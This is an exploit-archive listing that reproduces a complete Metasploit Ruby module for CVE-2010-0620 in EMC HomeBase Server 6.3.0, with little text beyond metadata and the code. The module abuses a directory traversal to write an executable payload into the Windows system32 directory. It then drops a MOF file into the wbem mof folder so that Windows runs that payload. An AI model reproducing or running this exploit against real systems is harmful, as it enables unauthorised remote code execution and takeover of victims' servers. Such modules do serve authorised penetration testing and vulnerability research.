EMC HomeBase Server Directory Traversal Remote Code Execution

2011-04-28T00:00:00
ID 1337DAY-ID-15982
Type zdt
Reporter metasploit
Modified 2011-04-28T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            ##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::EXE
    include Msf::Exploit::WbemExec
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'EMC HomeBase Server Directory Traversal Remote Code Execution',
            'Description'    => %q{
                    This module exploits a directory traversal and remote code execution
                flaw in EMC HomeBase Server 6.3.0.
 
                Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 12458 $',
            'References'     =>
                [
                    [ 'CVE', '2010-0620' ],
                    [ 'BID', '38380' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ],
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'    => 2048,
                    'DisableNops' => true,
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic',  { } ],
                ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Feb 23 2010'))
 
        register_options(
            [
                Opt::RPORT(18821),
                OptBool.new('SSL', [true, 'Use SSL', true]),
            ], self.class)
    end
 
    def exploit
 
        name = exe_name()
        exe_upload(name)
        select(nil,nil,nil,2)
        mof_upload(name)
        select(nil,nil,nil,4)
        handler
 
    end
 
    def exe_name
 
        rand_text_alpha_upper(8) + ".exe"
 
    end
 
    def exe_upload(exe_name)
 
        # this uploads our final exe payload.
 
        data = generate_payload_exe
        exe_dir = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\"
     
        connect
 
        banner = sock.get
            if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
                print_good("EMC HomeBase HomebaseSSL Service Detected!")
                print_status("Sending exe payload '#{exe_name}'...")
                sock.put("DATA #{exe_dir}#{exe_name} #{data.length}\r\n")
                ready = sock.get
                    if ( ready =~ /150 Ready to Recieve Data/ )
                        print_good("#{ready.strip}")
                        print_status("Sending '#{data.length}' bytes of data...")
                        sock.put(data)
                        complete = sock.get
                        if ( complete =~ /226 Data Complete/ )
                            print_good("#{complete.strip}")
                            print_status("Sending 'QUIT")
                            sock.put("quit\r\n")
                            return
                        end
                    else
                        print_error("Something went wrong...")
                        return
                    end
            else
                print_error("Not a EMC HomeBaseSSL Service")
                return
            end
         
        disconnect
 
    end
 
    def mof_upload(exe_name)
 
        # this is what runs our uploaded exe payload.
 
        mof_name = rand_text_alphanumeric(8+rand(8))
        mof      = generate_mof(mof_name, exe_name)
        mof_dir  = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\"
 
        connect
 
        banner = sock.get
            if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
                print_good("EMC HomeBase HomebaseSSL Service Detected!")
                print_status("Sending MOF file '#{mof_name}'...")
                sock.put("DATA #{mof_dir}#{mof_name} #{mof.length}\r\n")
                ready = sock.get
                    if ( ready =~ /150 Ready to Recieve Data/ )
                        print_good("#{ready.strip}")
                        print_status("Sending '#{mof.length}' bytes of data...")
                        sock.put(mof)
                        complete = sock.get
                            if ( complete =~ /226 Data Complete/ )
                                print_good("#{complete.strip}")
                                print_status("Sending 'QUIT")
                                sock.put("quit\r\n")
                                return
                            end
                    else
                        print_error("Something went wrong...")
                        return
                    end
            else
                print_error("Not a EMC HomeBaseSSL Service")
                return
                        end
 
        disconnect
 
    end
end



#  0day.today [2018-04-12]  #